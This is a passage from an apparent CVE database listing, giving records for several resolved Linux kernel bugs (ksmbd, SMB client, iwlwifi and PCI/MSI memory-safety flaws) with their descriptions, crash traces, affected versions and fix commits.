                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.51",
                  "versionStartIncluding": "5.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10.10",
                  "versionStartIncluding": "5.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.11",
                  "versionStartIncluding": "5.15",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nksmbd: unset the binding mark of a reused connection\n\nSteve French reported null pointer dereference error from sha256 lib.\ncifs.ko can send session setup requests on reused connection.\nIf reused connection is used for binding session, conn-\u003ebinding can\nstill remain true and generate_preauth_hash() will not set\nsess-\u003ePreauth_HashValue and it will be NULL.\nIt is used as a material to create an encryption key in\nksmbd_gen_smb311_encryptionkey. -\u003ePreauth_HashValue cause null pointer\ndereference error from crypto_shash_update().\n\nBUG: kernel NULL pointer dereference, address: 0000000000000000\n#PF: supervisor read access in kernel mode\n#PF: error_code(0x0000) - not-present page\nPGD 0 P4D 0\nOops: 0000 [#1] PREEMPT SMP PTI\nCPU: 8 PID: 429254 Comm: kworker/8:39\nHardware name: LENOVO 20MAS08500/20MAS08500, BIOS N2CET69W (1.52 )\nWorkqueue: ksmbd-io handle_ksmbd_work [ksmbd]\nRIP: 0010:lib_sha256_base_do_update.isra.0+0x11e/0x1d0 [sha256_ssse3]\n\u003cTASK\u003e\n? show_regs+0x6d/0x80\n? __die+0x24/0x80\n? page_fault_oops+0x99/0x1b0\n? do_user_addr_fault+0x2ee/0x6b0\n? exc_page_fault+0x83/0x1b0\n? asm_exc_page_fault+0x27/0x30\n? __pfx_sha256_transform_rorx+0x10/0x10 [sha256_ssse3]\n? lib_sha256_base_do_update.isra.0+0x11e/0x1d0 [sha256_ssse3]\n? __pfx_sha256_transform_rorx+0x10/0x10 [sha256_ssse3]\n? __pfx_sha256_transform_rorx+0x10/0x10 [sha256_ssse3]\n_sha256_update+0x77/0xa0 [sha256_ssse3]\nsha256_avx2_update+0x15/0x30 [sha256_ssse3]\ncrypto_shash_update+0x1e/0x40\nhmac_update+0x12/0x20\ncrypto_shash_update+0x1e/0x40\ngenerate_key+0x234/0x380 [ksmbd]\ngenerate_smb3encryptionkey+0x40/0x1c0 [ksmbd]\nksmbd_gen_smb311_encryptionkey+0x72/0xa0 [ksmbd]\nntlm_authenticate.isra.0+0x423/0x5d0 [ksmbd]\nsmb2_sess_setup+0x952/0xaa0 [ksmbd]\n__process_request+0xa3/0x1d0 [ksmbd]\n__handle_ksmbd_work+0x1c4/0x2f0 [ksmbd]\nhandle_ksmbd_work+0x2d/0xa0 [ksmbd]\nprocess_one_work+0x16c/0x350\nworker_thread+0x306/0x440\n? __pfx_worker_thread+0x10/0x10\nkthread+0xef/0x120\n? __pfx_kthread+0x10/0x10\nret_from_fork+0x44/0x70\n? __pfx_kthread+0x10/0x10\nret_from_fork_asm+0x1b/0x30\n\u003c/TASK\u003e"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:34:30.333Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/9914f1bd61d5e838bb1ab15a71076d37a6db65d1"
        },
        {
          "url": "https://git.kernel.org/stable/c/93d54a4b59c4b3d803d20aa645ab5ca71f3b3b02"
        },
        {
          "url": "https://git.kernel.org/stable/c/41bc256da7e47b679df87c7fc7a5b393052b9cce"
        },
        {
          "url": "https://git.kernel.org/stable/c/4c8496f44f5bb5c06cdef5eb130ab259643392a1"
        },
        {
          "url": "https://git.kernel.org/stable/c/78c5a6f1f630172b19af4912e755e1da93ef0ab5"
        }
      ],
      "title": "ksmbd: unset the binding mark of a reused connection",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-46795",
    "datePublished": "2024-09-18T07:12:50.259Z",
    "dateReserved": "2024-09-11T15:12:18.279Z",
    "dateUpdated": "2025-11-03T22:18:37.201Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2023-52751 (GCVE-0-2023-52751)

Vulnerability from cvelistv5 – Published: 2024-05-21 15:30 – Updated: 2026-01-05 10:17

Title

smb: client: fix use-after-free in smb2_query_info_compound()

Summary

In the Linux kernel, the following vulnerability has been resolved: smb: client: fix use-after-free in smb2_query_info_compound() The following UAF was triggered when running fstests generic/072 with KASAN enabled against Windows Server 2022 and mount options 'multichannel,max_channels=2,vers=3.1.1,mfsymlinks,noperm' BUG: KASAN: slab-use-after-free in smb2_query_info_compound+0x423/0x6d0 [cifs] Read of size 8 at addr ffff888014941048 by task xfs_io/27534 CPU: 0 PID: 27534 Comm: xfs_io Not tainted 6.6.0-rc7 #1 Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.16.2-3-gd478f380-rebuilt.opensuse.org 04/01/2014 Call Trace: dump_stack_lvl+0x4a/0x80 print_report+0xcf/0x650 ? srso_alias_return_thunk+0x5/0x7f ? srso_alias_return_thunk+0x5/0x7f ? __phys_addr+0x46/0x90 kasan_report+0xda/0x110 ? smb2_query_info_compound+0x423/0x6d0 [cifs] ? smb2_query_info_compound+0x423/0x6d0 [cifs] smb2_query_info_compound+0x423/0x6d0 [cifs] ? __pfx_smb2_query_info_compound+0x10/0x10 [cifs] ? srso_alias_return_thunk+0x5/0x7f ? __stack_depot_save+0x39/0x480 ? kasan_save_stack+0x33/0x60 ? kasan_set_track+0x25/0x30 ? ____kasan_slab_free+0x126/0x170 smb2_queryfs+0xc2/0x2c0 [cifs] ? __pfx_smb2_queryfs+0x10/0x10 [cifs] ? __pfx___lock_acquire+0x10/0x10 smb311_queryfs+0x210/0x220 [cifs] ? __pfx_smb311_queryfs+0x10/0x10 [cifs] ? srso_alias_return_thunk+0x5/0x7f ? __lock_acquire+0x480/0x26c0 ? lock_release+0x1ed/0x640 ? srso_alias_return_thunk+0x5/0x7f ? do_raw_spin_unlock+0x9b/0x100 cifs_statfs+0x18c/0x4b0 [cifs] statfs_by_dentry+0x9b/0xf0 fd_statfs+0x4e/0xb0 __do_sys_fstatfs+0x7f/0xe0 ? __pfx___do_sys_fstatfs+0x10/0x10 ? srso_alias_return_thunk+0x5/0x7f ? lockdep_hardirqs_on_prepare+0x136/0x200 ? srso_alias_return_thunk+0x5/0x7f do_syscall_64+0x3f/0x90 entry_SYSCALL_64_after_hwframe+0x6e/0xd8 Allocated by task 27534: kasan_save_stack+0x33/0x60 kasan_set_track+0x25/0x30 __kasan_kmalloc+0x8f/0xa0 open_cached_dir+0x71b/0x1240 [cifs] smb2_query_info_compound+0x5c3/0x6d0 [cifs] smb2_queryfs+0xc2/0x2c0 [cifs] smb311_queryfs+0x210/0x220 [cifs] cifs_statfs+0x18c/0x4b0 [cifs] statfs_by_dentry+0x9b/0xf0 fd_statfs+0x4e/0xb0 __do_sys_fstatfs+0x7f/0xe0 do_syscall_64+0x3f/0x90 entry_SYSCALL_64_after_hwframe+0x6e/0xd8 Freed by task 27534: kasan_save_stack+0x33/0x60 kasan_set_track+0x25/0x30 kasan_save_free_info+0x2b/0x50 ____kasan_slab_free+0x126/0x170 slab_free_freelist_hook+0xd0/0x1e0 __kmem_cache_free+0x9d/0x1b0 open_cached_dir+0xff5/0x1240 [cifs] smb2_query_info_compound+0x5c3/0x6d0 [cifs] smb2_queryfs+0xc2/0x2c0 [cifs] This is a race between open_cached_dir() and cached_dir_lease_break() where the cache entry for the open directory handle receives a lease break while creating it. And before returning from open_cached_dir(), we put the last reference of the new @cfid because of !@cfid->has_lease. Besides the UAF, while running xfstests a lot of missed lease breaks have been noticed in tests that run several concurrent statfs(2) calls on those cached fids CIFS: VFS: \\w22-root1.gandalf.test No task to wake, unknown frame... CIFS: VFS: \\w22-root1.gandalf.test Cmd: 18 Err: 0x0 Flags: 0x1... CIFS: VFS: \\w22-root1.gandalf.test smb buf 00000000715bfe83 len 108 CIFS: VFS: Dump pending requests: CIFS: VFS: \\w22-root1.gandalf.test No task to wake, unknown frame... CIFS: VFS: \\w22-root1.gandalf.test Cmd: 18 Err: 0x0 Flags: 0x1... CIFS: VFS: \\w22-root1.gandalf.test smb buf 000000005aa7316e len 108 ... To fix both, in open_cached_dir() ensure that @cfid->has_lease is set right before sending out compounded request so that any potential lease break will be get processed by demultiplex thread while we're still caching @cfid. And, if open failed for some reason, re-check @cfid->has_lease to decide whether or not put lease reference.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/6db94d08359c43f2c…
	https://git.kernel.org/stable/c/93877b9afc2994c89…
	https://git.kernel.org/stable/c/5c86919455c1edec9…

Impacted products

Vendor

Product

Version

Linux

Affected: ebe98f1447bbccf8228335c62d86af02a0ed23f7 , < 6db94d08359c43f2c8fe372811cdee04564a41b9 (git)
Affected: ebe98f1447bbccf8228335c62d86af02a0ed23f7 , < 93877b9afc2994c89362007aac480a7b150f386f (git)
Affected: ebe98f1447bbccf8228335c62d86af02a0ed23f7 , < 5c86919455c1edec99ebd3338ad213b59271a71b (git)

Linux

Affected: 6.1
Unaffected: 0 , < 6.1 (semver)
Unaffected: 6.5.13 , ≤ 6.5.* (semver)
Unaffected: 6.6.3 , ≤ 6.6.* (semver)
Unaffected: 6.7 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T23:11:36.015Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/6db94d08359c43f2c8fe372811cdee04564a41b9"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/93877b9afc2994c89362007aac480a7b150f386f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/5c86919455c1edec99ebd3338ad213b59271a71b"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2023-52751",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T15:37:15.794672Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:32.822Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/smb/client/cached_dir.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "6db94d08359c43f2c8fe372811cdee04564a41b9",
              "status": "affected",
              "version": "ebe98f1447bbccf8228335c62d86af02a0ed23f7",
              "versionType": "git"
            },
            {
              "lessThan": "93877b9afc2994c89362007aac480a7b150f386f",
              "status": "affected",
              "version": "ebe98f1447bbccf8228335c62d86af02a0ed23f7",
              "versionType": "git"
            },
            {
              "lessThan": "5c86919455c1edec99ebd3338ad213b59271a71b",
              "status": "affected",
              "version": "ebe98f1447bbccf8228335c62d86af02a0ed23f7",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "fs/smb/client/cached_dir.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.1"
            },
            {
              "lessThan": "6.1",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.5.*",
              "status": "unaffected",
              "version": "6.5.13",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.3",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.7",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.5.13",
                  "versionStartIncluding": "6.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.3",
                  "versionStartIncluding": "6.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7",
                  "versionStartIncluding": "6.1",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmb: client: fix use-after-free in smb2_query_info_compound()\n\nThe following UAF was triggered when running fstests generic/072 with\nKASAN enabled against Windows Server 2022 and mount options\n\u0027multichannel,max_channels=2,vers=3.1.1,mfsymlinks,noperm\u0027\n\n  BUG: KASAN: slab-use-after-free in smb2_query_info_compound+0x423/0x6d0 [cifs]\n  Read of size 8 at addr ffff888014941048 by task xfs_io/27534\n\n  CPU: 0 PID: 27534 Comm: xfs_io Not tainted 6.6.0-rc7 #1\n  Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS\n  rel-1.16.2-3-gd478f380-rebuilt.opensuse.org 04/01/2014\n  Call Trace:\n   dump_stack_lvl+0x4a/0x80\n   print_report+0xcf/0x650\n   ? srso_alias_return_thunk+0x5/0x7f\n   ? srso_alias_return_thunk+0x5/0x7f\n   ? __phys_addr+0x46/0x90\n   kasan_report+0xda/0x110\n   ? smb2_query_info_compound+0x423/0x6d0 [cifs]\n   ? smb2_query_info_compound+0x423/0x6d0 [cifs]\n   smb2_query_info_compound+0x423/0x6d0 [cifs]\n   ? __pfx_smb2_query_info_compound+0x10/0x10 [cifs]\n   ? srso_alias_return_thunk+0x5/0x7f\n   ? __stack_depot_save+0x39/0x480\n   ? kasan_save_stack+0x33/0x60\n   ? kasan_set_track+0x25/0x30\n   ? ____kasan_slab_free+0x126/0x170\n   smb2_queryfs+0xc2/0x2c0 [cifs]\n   ? __pfx_smb2_queryfs+0x10/0x10 [cifs]\n   ? __pfx___lock_acquire+0x10/0x10\n   smb311_queryfs+0x210/0x220 [cifs]\n   ? __pfx_smb311_queryfs+0x10/0x10 [cifs]\n   ? srso_alias_return_thunk+0x5/0x7f\n   ? __lock_acquire+0x480/0x26c0\n   ? lock_release+0x1ed/0x640\n   ? srso_alias_return_thunk+0x5/0x7f\n   ? do_raw_spin_unlock+0x9b/0x100\n   cifs_statfs+0x18c/0x4b0 [cifs]\n   statfs_by_dentry+0x9b/0xf0\n   fd_statfs+0x4e/0xb0\n   __do_sys_fstatfs+0x7f/0xe0\n   ? __pfx___do_sys_fstatfs+0x10/0x10\n   ? srso_alias_return_thunk+0x5/0x7f\n   ? lockdep_hardirqs_on_prepare+0x136/0x200\n   ? srso_alias_return_thunk+0x5/0x7f\n   do_syscall_64+0x3f/0x90\n   entry_SYSCALL_64_after_hwframe+0x6e/0xd8\n\n  Allocated by task 27534:\n   kasan_save_stack+0x33/0x60\n   kasan_set_track+0x25/0x30\n   __kasan_kmalloc+0x8f/0xa0\n   open_cached_dir+0x71b/0x1240 [cifs]\n   smb2_query_info_compound+0x5c3/0x6d0 [cifs]\n   smb2_queryfs+0xc2/0x2c0 [cifs]\n   smb311_queryfs+0x210/0x220 [cifs]\n   cifs_statfs+0x18c/0x4b0 [cifs]\n   statfs_by_dentry+0x9b/0xf0\n   fd_statfs+0x4e/0xb0\n   __do_sys_fstatfs+0x7f/0xe0\n   do_syscall_64+0x3f/0x90\n   entry_SYSCALL_64_after_hwframe+0x6e/0xd8\n\n  Freed by task 27534:\n   kasan_save_stack+0x33/0x60\n   kasan_set_track+0x25/0x30\n   kasan_save_free_info+0x2b/0x50\n   ____kasan_slab_free+0x126/0x170\n   slab_free_freelist_hook+0xd0/0x1e0\n   __kmem_cache_free+0x9d/0x1b0\n   open_cached_dir+0xff5/0x1240 [cifs]\n   smb2_query_info_compound+0x5c3/0x6d0 [cifs]\n   smb2_queryfs+0xc2/0x2c0 [cifs]\n\nThis is a race between open_cached_dir() and cached_dir_lease_break()\nwhere the cache entry for the open directory handle receives a lease\nbreak while creating it.  And before returning from open_cached_dir(),\nwe put the last reference of the new @cfid because of\n!@cfid-\u003ehas_lease.\n\nBesides the UAF, while running xfstests a lot of missed lease breaks\nhave been noticed in tests that run several concurrent statfs(2) calls\non those cached fids\n\n  CIFS: VFS: \\\\w22-root1.gandalf.test No task to wake, unknown frame...\n  CIFS: VFS: \\\\w22-root1.gandalf.test Cmd: 18 Err: 0x0 Flags: 0x1...\n  CIFS: VFS: \\\\w22-root1.gandalf.test smb buf 00000000715bfe83 len 108\n  CIFS: VFS: Dump pending requests:\n  CIFS: VFS: \\\\w22-root1.gandalf.test No task to wake, unknown frame...\n  CIFS: VFS: \\\\w22-root1.gandalf.test Cmd: 18 Err: 0x0 Flags: 0x1...\n  CIFS: VFS: \\\\w22-root1.gandalf.test smb buf 000000005aa7316e len 108\n  ...\n\nTo fix both, in open_cached_dir() ensure that @cfid-\u003ehas_lease is set\nright before sending out compounded request so that any potential\nlease break will be get processed by demultiplex thread while we\u0027re\nstill caching @cfid.  And, if open failed for some reason, re-check\n@cfid-\u003ehas_lease to decide whether or not put lease reference."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T10:17:07.109Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/6db94d08359c43f2c8fe372811cdee04564a41b9"
        },
        {
          "url": "https://git.kernel.org/stable/c/93877b9afc2994c89362007aac480a7b150f386f"
        },
        {
          "url": "https://git.kernel.org/stable/c/5c86919455c1edec99ebd3338ad213b59271a71b"
        }
      ],
      "title": "smb: client: fix use-after-free in smb2_query_info_compound()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2023-52751",
    "datePublished": "2024-05-21T15:30:40.226Z",
    "dateReserved": "2024-05-21T15:19:24.234Z",
    "dateUpdated": "2026-01-05T10:17:07.109Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2023-52531 (GCVE-0-2023-52531)

Vulnerability from cvelistv5 – Published: 2024-03-02 21:52 – Updated: 2025-05-04 07:38

Title

wifi: iwlwifi: mvm: Fix a memory corruption issue

Summary

In the Linux kernel, the following vulnerability has been resolved: wifi: iwlwifi: mvm: Fix a memory corruption issue A few lines above, space is kzalloc()'ed for: sizeof(struct iwl_nvm_data) + sizeof(struct ieee80211_channel) + sizeof(struct ieee80211_rate) 'mvm->nvm_data' is a 'struct iwl_nvm_data', so it is fine. At the end of this structure, there is the 'channels' flex array. Each element is of type 'struct ieee80211_channel'. So only 1 element is allocated in this array. When doing: mvm->nvm_data->bands[0].channels = mvm->nvm_data->channels; We point at the first element of the 'channels' flex array. So this is fine. However, when doing: mvm->nvm_data->bands[0].bitrates = (void *)((u8 *)mvm->nvm_data->channels + 1); because of the "(u8 *)" cast, we add only 1 to the address of the beginning of the flex array. It is likely that we want point at the 'struct ieee80211_rate' allocated just after. Remove the spurious casting so that the pointer arithmetic works as expected.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/7c8faa31080342aec…
	https://git.kernel.org/stable/c/6b3223449c959a8be…
	https://git.kernel.org/stable/c/f06cdd8d4ba525298…
	https://git.kernel.org/stable/c/8ba438ef3cacc4808…

Impacted products

Vendor

Product

Version

Linux

Affected: 8ca151b568b67a7b72dcfc6ee6ea7c107ddd795c , < 7c8faa31080342aec4903c9acb20caf82fcca1ef (git)
Affected: 8ca151b568b67a7b72dcfc6ee6ea7c107ddd795c , < 6b3223449c959a8be94a1f042288059e40fcccb0 (git)
Affected: 8ca151b568b67a7b72dcfc6ee6ea7c107ddd795c , < f06cdd8d4ba5252986f51f80cc30263636397128 (git)
Affected: 8ca151b568b67a7b72dcfc6ee6ea7c107ddd795c , < 8ba438ef3cacc4808a63ed0ce24d4f0942cfe55d (git)

Linux

Affected: 3.9
Unaffected: 0 , < 3.9 (semver)
Unaffected: 5.15.135 , ≤ 5.15.* (semver)
Unaffected: 6.1.57 , ≤ 6.1.* (semver)
Unaffected: 6.5.7 , ≤ 6.5.* (semver)
Unaffected: 6.6 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2023-52531",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-03-04T19:38:20.613089Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-04T17:23:46.452Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T23:03:20.656Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/7c8faa31080342aec4903c9acb20caf82fcca1ef"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/6b3223449c959a8be94a1f042288059e40fcccb0"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f06cdd8d4ba5252986f51f80cc30263636397128"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8ba438ef3cacc4808a63ed0ce24d4f0942cfe55d"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/wireless/intel/iwlwifi/mvm/fw.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "7c8faa31080342aec4903c9acb20caf82fcca1ef",
              "status": "affected",
              "version": "8ca151b568b67a7b72dcfc6ee6ea7c107ddd795c",
              "versionType": "git"
            },
            {
              "lessThan": "6b3223449c959a8be94a1f042288059e40fcccb0",
              "status": "affected",
              "version": "8ca151b568b67a7b72dcfc6ee6ea7c107ddd795c",
              "versionType": "git"
            },
            {
              "lessThan": "f06cdd8d4ba5252986f51f80cc30263636397128",
              "status": "affected",
              "version": "8ca151b568b67a7b72dcfc6ee6ea7c107ddd795c",
              "versionType": "git"
            },
            {
              "lessThan": "8ba438ef3cacc4808a63ed0ce24d4f0942cfe55d",
              "status": "affected",
              "version": "8ca151b568b67a7b72dcfc6ee6ea7c107ddd795c",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/wireless/intel/iwlwifi/mvm/fw.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "3.9"
            },
            {
              "lessThan": "3.9",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.135",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.57",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.5.*",
              "status": "unaffected",
              "version": "6.5.7",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.6",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.135",
                  "versionStartIncluding": "3.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.57",
                  "versionStartIncluding": "3.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.5.7",
                  "versionStartIncluding": "3.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6",
                  "versionStartIncluding": "3.9",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: iwlwifi: mvm: Fix a memory corruption issue\n\nA few lines above, space is kzalloc()\u0027ed for:\n\tsizeof(struct iwl_nvm_data) +\n\tsizeof(struct ieee80211_channel) +\n\tsizeof(struct ieee80211_rate)\n\n\u0027mvm-\u003envm_data\u0027 is a \u0027struct iwl_nvm_data\u0027, so it is fine.\n\nAt the end of this structure, there is the \u0027channels\u0027 flex array.\nEach element is of type \u0027struct ieee80211_channel\u0027.\nSo only 1 element is allocated in this array.\n\nWhen doing:\n  mvm-\u003envm_data-\u003ebands[0].channels = mvm-\u003envm_data-\u003echannels;\nWe point at the first element of the \u0027channels\u0027 flex array.\nSo this is fine.\n\nHowever, when doing:\n  mvm-\u003envm_data-\u003ebands[0].bitrates =\n\t\t\t(void *)((u8 *)mvm-\u003envm_data-\u003echannels + 1);\nbecause of the \"(u8 *)\" cast, we add only 1 to the address of the beginning\nof the flex array.\n\nIt is likely that we want point at the \u0027struct ieee80211_rate\u0027 allocated\njust after.\n\nRemove the spurious casting so that the pointer arithmetic works as\nexpected."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T07:38:42.739Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/7c8faa31080342aec4903c9acb20caf82fcca1ef"
        },
        {
          "url": "https://git.kernel.org/stable/c/6b3223449c959a8be94a1f042288059e40fcccb0"
        },
        {
          "url": "https://git.kernel.org/stable/c/f06cdd8d4ba5252986f51f80cc30263636397128"
        },
        {
          "url": "https://git.kernel.org/stable/c/8ba438ef3cacc4808a63ed0ce24d4f0942cfe55d"
        }
      ],
      "title": "wifi: iwlwifi: mvm: Fix a memory corruption issue",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2023-52531",
    "datePublished": "2024-03-02T21:52:35.664Z",
    "dateReserved": "2024-02-20T12:30:33.319Z",
    "dateUpdated": "2025-05-04T07:38:42.739Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-41096 (GCVE-0-2024-41096)

Vulnerability from cvelistv5 – Published: 2024-07-29 15:48 – Updated: 2025-11-03 22:00

Title

PCI/MSI: Fix UAF in msi_capability_init

Summary

In the Linux kernel, the following vulnerability has been resolved: PCI/MSI: Fix UAF in msi_capability_init KFENCE reports the following UAF: BUG: KFENCE: use-after-free read in __pci_enable_msi_range+0x2c0/0x488 Use-after-free read at 0x0000000024629571 (in kfence-#12): __pci_enable_msi_range+0x2c0/0x488 pci_alloc_irq_vectors_affinity+0xec/0x14c pci_alloc_irq_vectors+0x18/0x28 kfence-#12: 0x0000000008614900-0x00000000e06c228d, size=104, cache=kmalloc-128 allocated by task 81 on cpu 7 at 10.808142s: __kmem_cache_alloc_node+0x1f0/0x2bc kmalloc_trace+0x44/0x138 msi_alloc_desc+0x3c/0x9c msi_domain_insert_msi_desc+0x30/0x78 msi_setup_msi_desc+0x13c/0x184 __pci_enable_msi_range+0x258/0x488 pci_alloc_irq_vectors_affinity+0xec/0x14c pci_alloc_irq_vectors+0x18/0x28 freed by task 81 on cpu 7 at 10.811436s: msi_domain_free_descs+0xd4/0x10c msi_domain_free_locked.part.0+0xc0/0x1d8 msi_domain_alloc_irqs_all_locked+0xb4/0xbc pci_msi_setup_msi_irqs+0x30/0x4c __pci_enable_msi_range+0x2a8/0x488 pci_alloc_irq_vectors_affinity+0xec/0x14c 